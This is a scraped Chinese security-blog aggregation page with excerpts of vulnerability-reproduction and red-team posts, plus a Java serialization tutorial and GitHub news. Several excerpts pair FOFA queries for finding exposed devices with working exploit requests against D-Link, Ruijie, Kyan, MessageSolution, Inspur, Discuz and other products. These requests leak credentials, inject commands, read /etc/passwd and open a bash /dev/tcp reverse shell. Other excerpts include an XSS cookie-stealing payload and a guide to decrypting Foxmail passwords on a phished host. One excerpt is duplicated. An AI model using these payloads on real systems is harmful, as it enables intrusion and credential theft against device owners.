JAVA序列化与反序列化 安全开发

JAVA序列化与反序列化

扫一扫关注公众号,长期致力于安全研究前言:本文主要讲解JAVA序列化与反序列化0x01 简述Java 序列化是指把 Java 对象转换为字节序列的过程;       Java 反序列化是指把字节序列恢复为 Java 对象的过程;0x02 实验部分 看完上面的简述,可能很多人似懂非懂。 比如你现在写一个项目,该项目有一个登录功能。该功能每次登录都需要从指定文件txt中读取账号密码进行登录。那么该文件内账号密码为明文的状态,肯定是不安全的。所以这个时候就用到了序列化与反序列化。当把账号密码序列化之后,里面的账号密码就会变成字节形式。当有人打开也会看不懂。只有进行反序列化才能恢复原样。类代码:public class USER implements Serializable { public String user; public int pass; public USER(){ } public USER(String user,int pass){ this.user = user; this.pass = pass; } public void set(String user,int pass){ this.user = user; this.pass = pass; } public void get(){ System.out.println("user: " +this.user+" pass: "+this.pass); }}序列化代码:  USER us = new USER(); us.set("zhangsan",666666); ObjectOutputStream obj = new ObjectOutputStream(new FileOutputStream("D:\p.txt")); obj.writeObject(us); obj.close();可以看到这就是序列化的内容反序列化操作 ObjectInputStream obj = new ObjectInputStream(new FileInputStream("D:\p.txt")); USER u = (USER)obj.readObject(); u.get(); obj.close();        可以看到反序列化之后,成功将数据进行恢复0x03 结尾本文主要讲解了ObjectOutputStream和ObjectInputStream两种类11111微信搜索关注 "安全族" 长期致力于安全研究下方扫一下扫,即可关注 原文始发于微信公众号(安全族):JAVA序列化与反序列化
阅读全文
防止入“坑”之Web常见漏洞分析 安全文章

防止入“坑”之Web常见漏洞分析

网安教育培养网络安全人才技术交流、学习咨询0x01.暴力破解攻击(一)概述不断地去试用户名和密码,直到试出来(二)字典1.常见的弱口令2.互联网上被脱裤后的账号密码(撞库),人们为了方便记忆很多网站使用相同的账号密码3.指定字符利用工具生成专属字典,已知某妹子的姓名手机号爱好等生产专属子字典。(三)产生条件是否要求用户设置复杂密码是否每次认证使用安全的验证码是否对尝试登录的行为进行判断限制(例如五次输错暂停登录30分钟)是否在必要的情况下采用了双因素认证(例如不光验证账号密码,还验证登录设备)(四)测试流程1.确认登录接口的脆弱性2.对字典进行优化3.工具自动化操作技巧:1.试注册确认账号密码的要求(例如长度6位以上不允许出现数字)2.管理员后台密码admin/administrator/root几率高(五)常见场景1.前端验证验证码2.后台验证验证码验证码使用后没有被丢弃后台没有验证后台验证码参数为空,始终验证正确3.token防验证码后台生成token,会直接写在前端,编写脚本获取token,一起提交。0x02 XSS(跨站脚本漏洞)(一)产生原理攻击者在存在XXS漏洞的网站写入脚本,用户访问XXS页面返回带有恶意JS的页面,触发脚本,执行脚本发送窃取数据到攻击者指定的端口,攻击者伪造用户登录。主要原因:对输入和输出的控制不够严格,导致精心构造的脚本在输入后,在输到前端时被浏览器当作有效代码执行(二)测试流程1.输入特殊字符 '"<>?&tips:输入长度限制,改前端代码2.成功后输入payload(三)常见类型1.存储型特点:存在数据库,永久存储易发情况:留言板,注册2.反射型特点:一次性易发情况:查询页面get 带有XSS的URL伪装后发送给目标1<script>document.location='http://127.0.0.1:8080/pkxss/xcookie/cookie.php?     cookie='+document.cookie;</script>'</script>2 http://127.0.0.1:8080/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F127.0.0.1%3A8080%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E%27%3C%2Fscript%3E&submit=submitpost 制作另一个网页向C2发送数据3.DOM型特点:不与后台服务器产生数据交互,DOM操作前端代码输出产生,属于反射型构造前端闭合(四)防范措施输入做过滤,输出做转义0x03.CSRF(跨站请求伪造)(一)概述攻击者伪造一个请求,欺骗用户点击,用户一旦点击,在自己的登录态下发送请求,攻击完成,故CSRF也称“one click”攻击攻击完成满足的条件:1.网站没有对个人信息修改进行防CSRF处理,导致请求易被伪造2.lucy登录了后台的情况下,点击了攻击者的链接,lucy不在登录态,或者不点链接均不会成功与XSS的区别CSRF借用户权限完成攻击,XSS直接盗取用户的权限(二)测试流程抓包观察是否加验证码/token(三)get/post 漏洞演示get:明文传参post:借助另一台服务器上的网页发送post请求(四).Anti CSRF tokentoken随机数防御CSRF攻击(五)防范措施请求容易被伪造,加token验证0x04.sql注入闭合测试,构造合法SQL,欺骗后台执行SQL Inject漏洞原理概述没有对用户输入的内容进行限制如何判断注入点类型及常见注入类型讲解数字型字符型搜索型注入方式get&post的区别手工测试SQL Inject漏洞手T测试:基于union联合查询的信息获取( select )SQL Inject漏洞手工测试:基于报错的信息获取(select/delete/update/insert)SQL Inject漏洞手工测试:操作系统权限获取盲注对错误的信息屏蔽,或者使用标准方式输出0.没有报错信息1.不管输入正确还是错误,都只显示两种情况2.正确输入下,输入and 1=1/and 1=2发现可以判断SQL注入漏洞-盲注( boolian base )原理及测试SQL注入漏洞-盲注( time base )原理及测试其他注入类型SQL注入漏洞-基于http header的注入SQL注入表列明猜解暴力破解在sqli上的应用SQL注入-宽字节注入原理及演示sqlmap如何使用SQL-Map进行SQL Inject漏洞测试防范措施0x05.远程命令/代码执行漏洞(RCE)(一)远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。(二)远程代码执行因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。0x06.文件包含漏洞原理:程序猿提高效率以及让代码看起来简洁。使用“包含”函数功能。比如把一系列功能函数都写进fuction.php中,之后某个文件需要调用时就直接在文件头上一句<?php include fuction.php?>就可以调用函数代码。有时,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,导致攻击者可以通过修改包含文件的位置来让后台执行任意文件(代码)。文件包含漏洞的函数:包含函数include()和require()通过include()和require()语句,可以将PHP文件的内容插入另一个PHP文件(在服务器执行它之前)include 和 require 语句是相同,除了错误处理方面;require 会生成致命(E_COMPILE_ERROR)并停止脚本include只生成警告(E_WARNING),并且脚本会继续(一)本地文件包含漏洞1Test.php:2<?php $color='银色的',$car='奔驰轿车';?>34Index.html:5<html><body><h1>欢迎访问我的首页</h1>6<?php include 'test.php';echo "我有一辆".$color.$car"。";?>7</body> </html>8(二)远程文件包含漏洞远程文件包含漏洞形式跟本地文件包含漏洞差不多,在远程包含漏洞中,攻击者可以访问外部地址来加载远程代码。远程包含漏洞前提:使用include和require。配置php.ini如下allow_url_fopen=on // 默认打开Allow_url_include=on //默认关闭搭配合服务器,在配合服务器上写一句话木马对(一)和(二)的总结:两者都对前端传进来的包含文件没有进行处理P.S.新思路:文件包含漏洞搭配文件上传漏洞结合:上传图片马,文件包含执行(三).防范措施0.在功能设计上尽量不要将文件包含函数对应的文件放给前端进行选择和操作1.过滤各种…/…/ ,http://,https://2.配置php.ini配置文件:allow_url_fopen=offAllow_url_include=offmagic_quotes_gpc=on3.通过白名单策略,仅允许包含运行指定的文件,其他的都禁止0x07.文件下载漏洞很多网站都会提供文件下载功能,即用户可以通过点击下载链接,下载到链接所对应的文件。但是,如果文件下载功能设计不当,则可能导致攻击者可以通过构造文件路径,从而获取到后台服务器上的其他的敏感文件(又称:任意文件下载)防范措施:1.对传入的文件名进行严格的过滤和限定2.对文件下载的目录进行严格的限定0x08.文件上传漏洞因为业务功能,很多web站点都有文件上传的接口,比如:1.注册时上传头像图片(比如jpg,png,gif)2.上传文件附件(doc,xls)而在后台开发时并没有对上传的文件功能进行安全考虑或者采用了有缺陷的措施,导致攻击者可以通过一些手段绕过安全措施上传一些恶意文件(如:一句话木马)从而通过对恶意文件的访问来控制整个web后台(一)客户端绕过修改前端代码(二)服务端绕过1.MIME type验证原理与绕过针对后台使用$_FILES()判断文件类型MIME 多用途互联网邮件扩展类型 设定某种扩展名的文件用哪一种应用程序来打开的方式类型。每个MIME类型由两部分组成,前面是数据的大类别例如声音audio,图像image,后面定义具体的种类。常见的MIME类型超文本标记语言文本 .html,html text/html普通文本 .txt text/plain利用方式:抓包发送修改MIME类型后的包2.getimagesizeGetimagesize()返回结果中有文件大小和文件类型,如果用这个函数来获取类型,判断是否是图片,会存在问题此函数通过判断文件16进制的头部是否是图片头来判断是否是图片图片木马制作:方法0:直接伪造头部GIF89A方法1:1CMD:copy /b test.png + muma.php cccc.png方法2::使用GIMP(开源的图片修改软件),通过增加备注,写入执行命令(三)防范措施不要在前端使用JS实施上传限制策略通过服务端对上传文件进行限制:1.多条件组合检查,比如文件大小,路径,扩展名。文件类型,文件完整性2.对上传的文件在服务器上存储时进行重命名(制定合理的命名规则)3.对服务器端上传文件的目录进行权限控制(比如只读),限制执行权限带来的危害0x09.越权漏洞解析没有对用户权限进行严格的判断导致低权限的账号(比如普通用户)可以去完成高权限账号(比如超级管理员)的操作平行越权同级用户,不能相互操作各自内容,比如淘宝的各个用户不能修改对方的收货地址登录态与请求相互验证垂直越权权限低的用户执行权限高的用户普通用户重放超级用户的请求越权漏洞属于逻辑漏洞,是由于权限校验的逻辑不够严禁导致的,每个应用系统由于其足够复杂与不同,因此越权漏洞很难通过扫描工具发现,往往需要手动测试0x0A.反序列化漏洞在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。序列化serialize()序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: 1class S{ 2     public $test="pikachu"; 3 } 4 $s=new S(); //创建一个对象 5 serialize($s); //把这个对象进行序列化 6 序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";} 7     O:代表object 8     1:代表对象名字长度为一个字符 9     S:对象的名称10     1:代表对象里面有一个变量11     s:数据类型12     4:变量名称的长度13     test:变量名称14     s:数据类型15     7:变量值的长度16     pikachu:变量值反序列化unserialize()就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。1$u=unserialize("O:1:"S":1:{s:4:"test";s:7:"pikachu";}");2    echo $u->test; //得到的结果为pikachu序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题 1常见的几个魔法函数: 2   __construct()当一个对象创建时被调用 3 4    __destruct()当一个对象销毁时被调用 5 6    __toString()当一个对象被当作一个字符串使用 7 8    __sleep() 在对象在被序列化之前运行 910    __wakeup将在序列化之后立即被调用1112    漏洞举例:1314    class S{15        var $test = "pikachu";16        function __destruct(){17            echo $this->test;18        }19    }20    $s = $_GET;21    @$unser = unserialize($a);2223    payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}0x0B.XXE 1 2<?xml version="1.0"?> 3 4<!DOCTYPE note> 7 8<note> 9<to>Dave</to>10<from>Tom</from>11<head>Reminder</head>12<body>You are a good man</body>13</note>DTD:文档类型定义,用来为XML文档定义语约束的外部实体引用1 <?xml version = "1.0"?>2<!DOCTYPE ANY>5<x>&f</x>外部引用支持http,file,ftp协议如果一个接口支持接收xml数据,且没有对xml数据做任何安全上的措施,就可导致XXE漏洞开启外部实体解析没对传入的xml进行限制0x0C.SSRF(服务端请求伪造)其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据数据流:攻击者----->服务器---->目标地址根据后台使用的函数的不同,对应的影响和利用方法又有不一样PHP中下面函数的使用不当会导致SSRF:1 file_get_contents()2 fsockopen()3 curl_exec()如果一定要通过后台服务器远程去对用户指定(“或者预埋在前端的请求”)的地址进行资源请求,则请做好目标地址的过滤。0x0D.目录遍历…/…/…/ 找到根目录0x0E.敏感信息泄露一些注释信息被看到目录直接可以看到0x0F.不安全的URL跳转跳错到钓鱼网站版权声明:本文为CSDN博主「北风~」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/weixin_45055269/article/details/109494026 版权声明:著作权归作者所有。如有侵权请联系删除开源聚合网安训练营战疫期间,开源聚合网络安全基础班、实战班线上全面开启,学网络安全技术、升职加薪……有兴趣的可以加入开源聚合网安大家庭,一起学习、一起成长,考证书求职加分、升级加薪,有兴趣的可以咨询客服小姐姐哦!加QQ(1005989737)找小姐姐私聊哦精选文章环境搭建Python学员专辑信息收集CNVD安全求职渗透实战CVE高薪揭秘渗透测试工具网络安全行业神秘大礼包基础教程我们贴心备至用户答疑 QQ在线客服加入社群QQ+微信等着你我就知道你“在看” 本文始发于微信公众号(开源聚合网络空间安全研究院):防止入“坑”之Web常见漏洞分析
阅读全文
漏洞复现-某路由器账号密码泄露 安全文章

漏洞复现-某路由器账号密码泄露

免责声明:由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录!漏洞简介:D-Link 成立于 1986 年,创立至今三十年,凭借其完整多元的产品线以及优异且屡获国际奖项肯定的网络产品和服务,友讯科技已然成为年营收总值超过十亿美元的国际知名企业。 D-Link 在快速、竞争和不断发展的环境中,将持续提供高效能的网络解决方案协助消费者及各类型企业用户。近期网上爆出D-Link-Dir设备存在账号密码泄露漏洞!FOFA语句:app="D_Link-DIR-868L" 漏洞POC:POST /getcfg.php HTTP/1.1Host: xxxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: uid=XFOB50sMqSUpgrade-Insecure-Requests: 1Content-Type:application/x-www-form-urlencodedContent-Length: 61SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1利用截图:脚本使用:获取脚本回复: DLink-DIR 本文始发于微信公众号(Fight Tigers Team):漏洞复现-某路由器账号密码泄露
阅读全文
红队攻防-内网密码搜集 [ 离线解密 foxmail 客户端中保存的所有邮箱账号密码 ] 安全文章

红队攻防-内网密码搜集 [ 离线解密 foxmail 客户端中保存的所有邮箱账号密码 ]

0x00 场景假设我们此处通过发信钓到了一台目标单机,在翻这台单机的时候,发现了它装的有 foxmail 客户端,然后在 forxmail 安装目录下还发现存在数据目录 < 即 Storage 目录,一般情 况下,只有在有邮箱连接记录保存过账号密码时才会自动创建该目录,当然啦,这个密码肯定不会直接明文保存在本地 >,也就说,本地很可能保存的有邮箱账号密码,现在的想法就是想 去解密对应邮箱目录下保存有密码的那个文件,该怎么搞呢? 其实,简单...0x01 具体过程一般情况下,当我们钓到目标的某台单机之后,都会选择一个固定的操作目录来进行后续的动作,比如,当前用户的临时目录,就是个还不错的选择, 因为这里几乎不存在什么不能读写的问题,后续不管是传工具,文件,做维持...啥的都很方便,而且很规整,后期便于集中清理,发现很多弟兄在操作的机器多了之后都喜欢乱传一气,导 致最后自己都不知道在哪台机器上还留的有东西忘了清,这显然不是个什么好习惯,所以...多注意下就好,反溯源很大一部分,都是基于你平时点滴的操作习惯来得,操作规整,思维缜密, 水平一般的管理员其实很难发现,而不是完全依赖你所用的技术到底有多高端通过读取当前机器已安装的软件列表,发现其存在 foxmail 客户端,版本为 7.2.x,特别注意下这个版本,因为不同的版本,账号密码保存的位置和文件名都是有所不同的,比如,此处 为 7.2.x 版本,账号密码默认就保存在 Account 目录下的 Account.rec0 文件中,7.x 版本貌似是保存在一个叫 Accounts.tdat 的文件中,而 6.x 版本则是保存在一个叫 Account.stg 的文件中紧接着,在 Foxmail 安装目录下发现其存在 Storage 目录,并且在该目录下还发现两个邮箱的连接记录接着,要做的事情就非常简单了,只需要把对应邮箱目录下的 Account.rec0 文件想办法拖回本地然后在本地用 securityxploded < 弟兄们应该都很清楚,这是一个神奇的网站😊 >提供好的解密工具把文件拖进去解密即可,最终,分别得到两个邮箱的明文账号密码如下0x02 小结注意,此处的所有操作都是在非管理员权限下进行的,至于拿到这个邮箱账号密码之后的价值和用途,想必就不用再多说了吧,因为目标邮箱的历史邮件里可能保存有 大量的敏感资料信息,所以在内网渗透中翻邮件应该成为你的日常操作,退一步来讲,如果当前是在域环境中,邮箱账号密码很可能也是对应的域用户密码,另外,这个邮箱账号密码和 oa 系统有也可能是通用的,所以,你都懂了...此处没涉及到什么具体原理,比较简单,偏实用为主,所以就没去细扣那些,有任何问题,欢迎弟兄们及时反馈,非常感谢,祝好运 本文原创作者:By Klion最后由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的 本文始发于微信公众号(无害实验室sec):红队攻防-内网密码搜集 < 离线解密 foxmail 客户端中保存的所有邮箱账号密码 >
阅读全文
Github废弃账号密码可用于验证Git操作 安全闲碎

Github废弃账号密码可用于验证Git操作

8月12日,GitHub官方宣布从即日开始账号密码将不再为验证Git操作所用。 这项改动第一次在去年7月被提出,GitHub称已认证的Git操作能够要求使用SSH密钥或令牌认证。 从2020年11月13日开始,GitHub还弃用了通过REST API进行身份验证的密码身份验证。  “从2021年8月13日太平洋标准时间09:00开始,我们在GitHub.com上对Git操作进行身份验证时将不再接受账户密码。”该公司宣称。  “取而代之,所有经过身份验证的Git操作都需要令牌认证(例如,个人访问,OAuth,SSH密钥或GitHub应用程序安装令牌)。” 如果您仍在使用用户名和密码来验证Git操作,在明天新规则颁布前,您应该按照以下步骤来防止中断: 1.  对于开发人员,如果您现在正在使用密码对GitHub.com的Git操作进行身份验证,则应该在2021年8月13日之前通过HTTPS(推荐)或SSH密钥开始使用个人访问令牌,以避免中断。如果您收到警告,提示您用的是过期第三方集成,则应将客户端更新至最新版本。“2.  对于集成商,您必须在2021年8月13日之前使用网络或设备授权流程对集成进行身份验证,以避免中断。更多信息请参阅授权OAuth app和开发者博客上的公示。 如果您想确保不再使用密码身份验证,可启用双因素身份验证,它需要OAuth或个人访问令牌用于通过Git和第三方集成进行的所有身份验证操作。 如果您已经为您的GitHub账号启用双因素身份验证,则您不会收到该身份验证改动的任何影响,因为您已经在使用令牌或SSH身份验证。 多年来,GitHub通过添加双因素身份验证、登陆警报、验证设备、阻止使用受损密码和WebAuthn支持来提高账户安全性。 用于对Git操作进行强制令牌身份验证,通过防止攻击者使用被盗凭证或重复使用的密码来劫持账户,提高了GitHub账号抵御接管企图攻击的能力。 5月,GitHub还增加了对使用FIDO2安全密钥保护SSH Git 操作的支持,以提升对接管企图攻击的保护。扫描二维码关注更多 本文始发于微信公众号(山石网科安全技术研究院):Github废弃账号密码可用于验证Git操作
阅读全文
锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞 安全博客

锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞

锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞漏洞描述锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 编号:CNVD-2021-14536 Fofa指纹1title="RG-UAC登录页面" && body="admin" 漏洞利用 源代码搜索: MD5解密: 登录成功 自动化 POC1234567891011121314151617181920212223242526272829303132333435363738394041424344454647import requestsimport sysimport randomimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title(): print('+------------------------------------------') print('+ 33
阅读全文
Kyan网络监控账号密码泄露 安全漏洞

Kyan网络监控账号密码泄露

免责声明:由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录!FOFA语法:title="platform - Login"POC:http://url/hosts脚本利用:支持多个批量扫描、支持单个检测、支持直接获取账号密码def poc(url): target = url+"/hosts" r = requests.get(url=target,timeout=5,verify=False) if r.status_code==200 and "UserName" in r.text: print(target+" "+"漏洞存在!") s = str(r.text) match = re.findall(r'(?<=UserName=).*',s,re.I|re.M) #提取UserName右边的字符串 if match: print("账号为: "+match) else: print("错误") match1 = re.findall(r'(?<=Password=).*',s,re.I|re.M) #提取Password右边的字符串 if match1: print("密码为: "+match1) else: print("错误") else: print(target+" "+"漏洞不存在!")利用截图:脚本获取请回复:Kyan泄密切勿用于非法测试!切勿用于非法测试!切勿用于非法测试! 本文始发于微信公众号(Fight Tigers Team):Kyan网络监控账号密码泄露
阅读全文
【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现 安全文章

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

0x01 前言MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。0x02 漏洞影响MessageSolution 企业邮件归档管理系统EEA0x03 漏洞复现FOFA语句title="MessageSolution Enterprise Email Archiving (EEA)"PAYLOAD:http://ip/authenticationserverservlet/直接访问如下,会看到泄露的账号密码利用泄露的账号密码登录系统验证脚本0x04 参考链接https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ【往期推荐】【内网渗透】内网信息收集命令汇总【内网渗透】域内信息收集命令汇总【超详细 | Python】CS免杀-Shellcode Loader原理(python)【超详细 | Python】CS免杀-分离+混淆免杀思路【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现【奇淫巧技】如何成为一个合格的“FOFA”工程师记一次HW实战笔记 | 艰难的提权爬坑【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】【超详细】Fastjson1.2.24反序列化漏洞复现走过路过的大佬们留个关注再走呗往期文章有彩蛋哦 本文始发于微信公众号(洞见网安):【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现
阅读全文
MessageSolution邮件归档系统账号密码信息泄露 安全文章

MessageSolution邮件归档系统账号密码信息泄露

一、【CNVD-2021-10543】MessageSolution邮件归档系统账号密码信息泄露FOFA: title="MessageSolution Enterprise Email Archiving (EEA)" 前台的样子:EXP:http://ip/authenticationserverservlet/访问如图,获取得到账号&密码:二、【CVE-2020-25078】D-Link DCS系列监控账号密码信息泄露FOFA: app="D_Link-DCS-2530L"直接访问需要账号密码登录:EXP:http://ip/config/getuser?index=0如图,得到账号密码:三、浪潮 ClusterEngineV4.0 任意命令执行FOFA: title="TSCEV4.0"前台的样子:登录处抓包,然后闭合username字段重发引发报错。如图:构造POC,请求包内容:POST /login HTTP/1.1Host: x.x.x.xConnection: closeContent-Length: 61Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: lang=cnop=login&username=admin`ping wsgpgq.dnslog.cn`&password=admin四、JD-FreeFuck 后台RCEFOFA: title="京东薅羊毛控制面板"前台的样子:如果运气足够好的话:默认账号密码useradmin/supermanito构造POC,请求包内容:POST /runCmd HTTP/1.1Host: x.x.x.xContent-Length: 54Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Origin: http://x.x.x.xContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://x.x.x.x/runCmdAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: connect.0.13416810928385314=s%3ADihBr216xOtHaZ6_yq86aIF0UNpiCo5v.jLFQG19H1e%2FrP6NwaH0UX2tjYwsFQuhXIIaSIkVG4JgConnection: closecmd=bash+jd.sh+%3Bcat+%2Fetc%2Fpasswd%3B+now&delay=500尝试反弹shell:cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500成功!五、【CVE-2021-21975】VMwar vRealize Operations Manager SSRFFOFA:title="vRealize Operations Manager"前台的样子:POC:POST /casa/nodes/thumbprints HTTP/1.1Host: x.x.x.xContent-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Length: 20六、三星 WLAN AP WEA453e路由器远程命令执行FOFA:title=="Samsung...
阅读全文
复现了13个漏洞 安全漏洞

复现了13个漏洞

pdf版本:后台回复“复现”下载pdf版本查看一、【CNVD-2021-10543】MessageSolution邮件归档系统账号密码信息泄露FOFA: title="MessageSolution Enterprise Email Archiving (EEA)"前台的样子:EXP:http://ip/authenticationserverservlet/访问如图,获取得到账号&密码:二、【CVE-2020-25078】D-Link DCS系列监控账号密码信息泄露FOFA: app="D_Link-DCS-2530L"直接访问需要账号密码登录:EXP:http://ip/config/getuser?index=0如图,得到账号密码:三、浪潮 ClusterEngineV4.0 任意命令执行FOFA: title="TSCEV4.0"前台的样子:登录处抓包,然后闭合username字段重发引发报错。如图:构造POC,请求包内容:POST /login HTTP/1.1Host: x.x.x.xConnection: closeContent-Length: 61Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: lang=cnop=login&username=admin`ping wsgpgq.dnslog.cn`&password=admin四、JD-FreeFuck 后台RCEFOFA: title="京东薅羊毛控制面板"前台的样子:如果运气足够好的话:默认账号密码useradmin/supermanito构造POC,请求包内容:POST /runCmd HTTP/1.1Host: x.x.x.xContent-Length: 54Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Origin: http://x.x.x.xContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://x.x.x.x/runCmdAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: connect.0.13416810928385314=s%3ADihBr216xOtHaZ6_yq86aIF0UNpiCo5v.jLFQG19H1e%2FrP6NwaH0UX2tjYwsFQuhXIIaSIkVG4JgConnection: closecmd=bash+jd.sh+%3Bcat+%2Fetc%2Fpasswd%3B+now&delay=500尝试反弹shell:cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500成功!五、【CVE-2021-21975】VMwar vRealize Operations Manager SSRFFOFA:title="vRealize Operations Manager"前台的样子:POC:POST /casa/nodes/thumbprints HTTP/1.1Host: x.x.x.xContent-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Length: 20六、三星 WLAN AP WEA453e路由器远程命令执行FOFA:title=="Samsung WLAN...
阅读全文
【Exp】DZ 2.0 直接暴管理账号密码 lcx

【Exp】DZ 2.0 直接暴管理账号密码

DZ 2.0 直接暴管理账号密码 http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D 假如利用不成功说明不是默认前缀 可以用 http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D 暴前缀 不过一般都没人改 密码破不了。我只是发exp 的 反正我测试成功、、、、、、只有部分站 http://tools88.com/safe/Zizzy.php 放到这里转换下 那个Base64 解密 自己修改测试吧。。。。 文章来源于lcx.cc:【Exp】DZ 2.0 直接暴管理账号密码相关推荐: 【技巧】使用批处理、Bat替换txt文本中的字符使用批处理、Bat替换TXT文本中的字符: rem BY scansql.txt setlocal enabledelayedexpansion for /f "tokens=*" %%i in (scansql.txt) do ( set var=%%i s…
阅读全文
